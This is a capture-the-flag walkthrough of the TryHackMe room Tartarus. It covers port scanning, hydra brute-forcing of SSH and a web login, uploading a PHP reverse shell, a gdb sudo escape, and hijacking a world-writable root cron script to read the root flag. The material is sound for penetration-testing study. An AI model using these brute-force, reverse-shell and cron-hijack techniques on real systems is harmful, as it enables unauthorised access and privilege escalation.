WriteUp — THM Tartarus

This is a beginner box based on simple enumeration of services and basic privilege escalation techniques. Based Jake

This writeup is for TryHackMe room Tartarus.

Photo by NihoNorway graphy on Unsplash

NMAP

Let’s start, as usual, with nmap:

nmap -sC -sV -p- 10.10.34.22 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 13:48 EEST
Nmap scan report for 10.10.34.22
Host is up (0.053s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp            17 Jul 05 21:45 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.108.247
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 98:6c:7f:49:db:54:cb:36:6d:d5:ff:75:42:4c:a7:e0 (RSA)
|   256 0c:7b:1a:9c:ed:4b:29:f5:3e:be:1c:9a:e4:4c:07:2c (ECDSA)
|_  256 50:09:9f:c0:67:3e:89:93:b0:c9:85:f1:93:89:50:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.71 seconds

WWW

Navigating to the server IP with browser we notice Apache default page.

nikto -h 10.10.34.22 

points us to take a look at robots.txt which contains

User-Agent: *
Disallow : /admin-dir

I told d4rckh we should hide our things deep.

This might be a username for dictionary attack. Also we notice that /admin-dir is disallowed so it might contain something worth checking.

It contains two files: userid and credentials.txt which contain potential usernames and passwords including d4rckh. Let’s feed these to hydra.

SSH

hydra -L userid -P credentials.txt -t 4 10.10.34.22 ssh

Didn’t work, Let’s try FTP.

FTP

FTP allows anonymous login, so let’s take a look what’s inside. A single file test.txt with nothing special in it. But there is more, doing ls -la reveals something hidden:

ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 …
-rw-r — r — 1 ftp ftp 17 Jul 05 21:45 test.txt

browsing into that directory eventually lands us with yougotgoodeyes.txt which contains /sUp3r-s3cr3t. That URL lands us to a login page that we can test the usernames once more. Again with hydra:

hydra -L userid -P credentials.txt 10.10.34.22 http-post-form ‘/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect username!’

Once we get in, we can upload files. Maybe a reverse shell? I get one from https://github.com/pentestmonkey/php-reverse-shell and modify local host parameters.

But where does the uploaded file go? No luck from directories I know this far, so fire up gobuster once more:

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.34.22/sUp3r-s3cr3t dir

It reveals /images directory so the file can be accessed from http://10.10.34.22/sUp3r-s3cr3t/images/uploads/

Let’s get the page and get the shell. BOOM!

cat /home/d4rckh/user.txt
__REDACTED__

Privesc

Python is available, so upgrade to proper terminal using:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

check sudo -l, always a potential source for escalation:

sudo -l
Matching Defaults entries for www-data on ubuntu-xenial:
 env_reset, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-xenial:
 (thirtytwo) NOPASSWD: /var/www/gdb

Get LinEnum: https://github.com/rebootuser/LinEnum and run in on the box. Figure out a possible exploit:

[+] Possibly interesting SUID files:
 — -sr-x — x+ 1 thirtytwo thirtytwo 6546408 Jul 5 21:45 /var/www/gdb

Look for instructions from GTFOBins and upgrade to thirtytwo:

sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit

But no new information from that user. Just another rabbit hole.

Let’s look at more options by enumerating home directories. there is an interesting file in d4rckh home folder:

www-data@ubuntu-xenial:/home/d4rckh$ ls -la
ls -la
total 16
drwxr-xr-x 2 d4rckh d4rckh 4096 Jul  5 21:35 .
drwxr-xr-x 5 root   root   4096 Jul  5 21:45 ..
-rwxrwxrwx 1 root   root    129 Jul  5 21:45 cleanup.py
-rw-r--r-- 1 d4rckh d4rckh   33 Jul  5 21:45 user.txt

Looking at the report from LinEum we can see that it is a cronjob run every two minutes.

/2 * * * * root python /home/d4rckh/cleanup.py

The file is world writable so we can change it to anything. Dump directories to /tmp, drop reverse shells, fiddle with users etc. Let’s just copy the root flag somewhere we can read it:

# -*- coding: utf-8 -*-
#!/usr/bin/env python
import os
import sys
try:
 os.system('sudo cat /root/root.txt > /tmp/root.txt')
except:
 sys.exit()

wait a while and pickup the flag:

cat /tmp/root.txt
__REDACTED__

That’s all folks!